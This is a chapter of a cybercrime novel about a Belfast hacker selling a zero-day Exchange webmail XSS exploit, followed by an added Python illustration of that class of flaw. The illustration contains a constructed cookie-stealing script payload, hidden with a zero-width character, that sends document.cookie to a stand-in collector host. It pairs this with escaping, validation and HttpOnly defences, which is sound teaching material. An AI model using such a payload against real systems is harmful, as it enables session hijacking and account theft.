Virus Bomb
From author Greg Scott:
“Enjoy this chapter from my book, Virus Bomb about how Turlach Flanagan finds a zero day
exploit and then markets and sells it. Zero day is the term used to describe a new software
vulnerability which attackers can manipulate to affect that software’s security. Zero days
command a premium price in a thriving criminal underground marketplace, because potential
attackers are often willing to outbid software company bug bounties. In my book, the
mastermind behind the Elaine Devereux persona is one such potential attacker.”
Zero-Day
The candlelight gave Turlach Flanagan’s room above a pub in Belfast, Northern Ireland, a rustic
feel, even though it was crammed with computer equipment. “You’re knackered,” he shouted
and pounded his desk. He leaned back in his chair and rubbed his eyes. But what else besides
Irish whiskey could numb the pain after losing his family during the troubles after the Irish
Troubles?
He rose from his desk and staggered to his bathroom. The image in the mirror, with deep
bags under his bloodshot eyes and greasy, grey hair, mostly pulled back and tied off into a
ponytail with a rubber band, looked more like a homeless refugee than a former college
professor.
How does your mind still function?
But maybe his mind wasn’t functioning so well after all.
He lurched back to his desk and stared at his work in progress. The laptop screen,
Microsoft Exchange reference books, hand-drawn flow diagrams, code listings, and empty shot
glasses all mocked him. He swept his arm across the desk, sending it all crashing to the floor. A
lit candle also went flying, landing on the floor in the middle of all that paper. It smoldered and
then ignited.
“You nappy arwshe, maybe it’s time to get it over with.”
Like a scientist monitoring an experiment, he watched the flames consume a few papers
and then a notebook and now some newspapers. The carpet smoldered and plastic jewel cases
around a few CDs started to melt, filling the room with acrid smoke. Would one hundred proof
Irish whiskey put it out or make it worse?
He grabbed his last remaining unopened bottle, twisted off the cap, downed a swig, and
then poured it over the growing flames. “Ow!” The flames jumped and singed his hand.
“You’re a flaming eejit, but it’s not time to die in a ball o’ fire yet!”
He ran back to his bathroom and filled a bucket with water. He ran back and poured it on
the flames.
The flames hissed and smoked and then subsided as the water spread across the black
spot on the carpeted floor, leaving a pile of wet paper and ashes and a smoky distillery aroma in
the air.
He tipped the bottle back to finish it off and then dropped it in the middle of the wet mess
and teetered to his bed.
“You’re a manky neddy!” he mumbled as he drifted into a fitful sleep.
Five hours later, the room still smelled like smoke, which didn’t help his growing
headache. He swung his feet to the floor, rubbed his eyes, stood, and opened a window. A few
birds chirped outside, announcing predawn of another miserable day on this miserable little
planet. He staggered to his now-empty work desk and surveyed the damage from last night.
“Serves ya right, ya mongo sap.”
He picked up his laptop from the edge of the booze-soaked pile of papers on the floor and
dried the bottom with his body-odor-stained shirt. He pressed the power button and waited. After
a few seconds, it showed the familiar, “Press CTRL + ALT + DELETE to log on.”
“A rake of good luck,” he mumbled. “Now, stop arsing around, and let’s find what we’re
looking for.”
A few hours later, Turlach leaned back in his chair, ran a hand through his greasy hair,
wiped it on his shirt, and smiled. The “Hello World” window on his laptop screen wasn’t
important. What was important was the method he came up with to generate that little picture.
The sunlight made his head hurt. And he needed to use the bathroom. He didn’t care. Not yet.
Document what we have first. He launched Notepad and composed a first draft of an ad
he would post on an underground internet forum. The ad read:
A new zero-day XSS exploit with Microsoft Exchange. Launch OWA, log on, and compose a new message. Put a specially crafted string in the ‘bcc’ field to run a local script of your choice. Requires phishing to intercept the initial logon to deploy your payload script. $30K in bitcoin, including consulting to implement. I will provide a sample script to grab the user’s cookie and upload to Dropbox. You can modify as appropriate. Serious buyers only.
Turlach stared at the ad text for a few minutes before clicking the “Submit” button to post
it. He smiled. Which made the hammer inside his head pound even harder. But no matter. If
successful, this exploit would pay for all new computer equipment and more.
Now he could pee. He returned a few minutes later with a glass of orange juice.
Responses were already coming in.
One response, from somebody named John, was typical: “Give me more information.
How would this work?”
Turlach shook his head. “Idiots!” But if he wanted the money for the exploit he
discovered, it was obvious he’d have to spell it out to these neddies. Thirty minutes later, his next
post summed it up:
For all you newbies, a zero-day exploit is one that hasn’t been discovered yet by the software vendor. OWA, or Outlook Web App, is the Microsoft webmail function that comes with Microsoft Exchange Server. The exploit I discovered allows you to use OWA to run an arbitrary script on your computer if you place a specially formatted string in the bcc field. This script could upload a cookie with authentication information, or it could access your email and calendars, or it could upload documents from your profile. Or it could do anything else you want, limited only by your primitive imaginations. I provided a sample script to upload a cookie. You can use my sample to build something more elaborate if you want. Or pay me to do it. The object, of course, is not to run the script on your computer. The object is to entice somebody else to run it on his computer and send every important piece of information about his pitiful life to you. To take advantage of my exploit, you need to convince your targeted user to run the program I wrote to deploy your script. That’s why it requires phishing. And I’ll also answer your next obvious question. No, your targeted users will not see the string my program injects into the bcc field because the string contains nonprintable characters.
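The exploit in the chapter is fiction and the novel never specifies it. The example below is an added, generic illustration of the class of flaw Turlach’s post names (cross-site scripting via an echoed form field, a cookie-stealing payload, and nonprintable characters used to hide it), not code from the book or from any real Outlook Web App weakness. The sample “bcc” string, the two tiny page templates, the collector hostname and every function name are constructed for the demonstration.

```python
"""Generic XSS illustration for the kind of flaw described in the forum post.

Added example. It does not reproduce the novel's (fictional, unspecified)
exploit or any real OWA vulnerability. The inputs and templates here are
constructed solely to show the mechanism and the defences.
"""
import html
import re
import unicodedata

# Constructed sample: an address, a zero-width space (category Cf, invisible
# when echoed back to the user), then a script that leaks document.cookie to
# a made-up collector host.
ATTACKER_BCC = (
    "alice@example.test\u200b"
    "<script>new Image().src='https://collector.example.test/?c='+document.cookie</script>"
)

_SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)
_ADDRESS = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def render_unsafe(bcc: str) -> str:
    """Vulnerable confirmation page: the field is interpolated into HTML as-is,
    so a <script> element in it becomes live markup for the victim's browser."""
    return f"<p>Bcc: {bcc}</p>"


def render_safe(bcc: str) -> str:
    """Hardened version: HTML-encode the value before interpolation. The
    payload survives as visible text ('&lt;script&gt;...') but never executes."""
    return f"<p>Bcc: {html.escape(bcc)}</p>"


def contains_live_script(markup: str) -> bool:
    """Would a browser parse a real <script> element out of this markup?"""
    return _SCRIPT_TAG.search(markup) is not None


def has_nonprintable(s: str) -> bool:
    """True if s carries control (Cc) or format (Cf) characters, e.g. U+200B,
    which render as nothing and let a string look shorter than it is."""
    return any(unicodedata.category(ch) in ("Cc", "Cf") for ch in s)


def strip_nonprintable(s: str) -> str:
    """Drop control/format characters before validating or displaying input."""
    return "".join(ch for ch in s if unicodedata.category(ch) not in ("Cc", "Cf"))


def validate_recipients(field: str) -> list:
    """Input-side defence: accept only a list of plain addresses. Rejects the
    attacker string twice over (hidden characters, then the non-address tail)."""
    if has_nonprintable(field):
        raise ValueError("recipient field contains hidden control/format characters")
    addresses = [part.strip() for part in re.split(r"[,;]", field) if part.strip()]
    for addr in addresses:
        if not _ADDRESS.match(addr):
            raise ValueError(f"not a valid address: {addr!r}")
    return addresses


def session_cookie_header(token: str) -> str:
    """Defence in depth: an HttpOnly cookie is withheld from document.cookie, so
    even a script that does run cannot read this session token."""
    return f"Set-Cookie: session={token}; Secure; HttpOnly; SameSite=Lax; Path=/"


if __name__ == "__main__":
    print("unsafe render executes script:", contains_live_script(render_unsafe(ATTACKER_BCC)))
    print("safe render executes script:  ", contains_live_script(render_safe(ATTACKER_BCC)))
    print("hidden characters present:    ", has_nonprintable(ATTACKER_BCC))
    try:
        validate_recipients(ATTACKER_BCC)
    except ValueError as err:
        print("validator rejected input:     ", err)
    print(validate_recipients("alice@example.test, bob@example.test"))
    print(session_cookie_header("constructed-token"))
```

The two render functions differ by one call to `html.escape`, which is the whole output-encoding defence; the validator and the HttpOnly cookie are the layers that still help if some other page forgets to encode.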
In Tehran, 6,200 kilometers away, the mastermind behind the Elaine Devereux persona spotted
the ad while scouring the usual forums. He stroked his chin. Yes, this could be useful.
Note to readers
Turlach Flanagan, AKA Livefree, is one player in a global criminal supply chain of venture
capitalists, integrators, and specialists, all connected over the internet. If you want to attack a
country or plunder a business, Turlach, or somebody like him, has the tools you need, if you
know where to look. Just make sure you offer the right price. Be prepared to haggle.
Curious about what 100 proof Irish Whiskey will do to a fire? Enjoy this video I made with my
Turlach has a fascinating backstory. Read about it right here.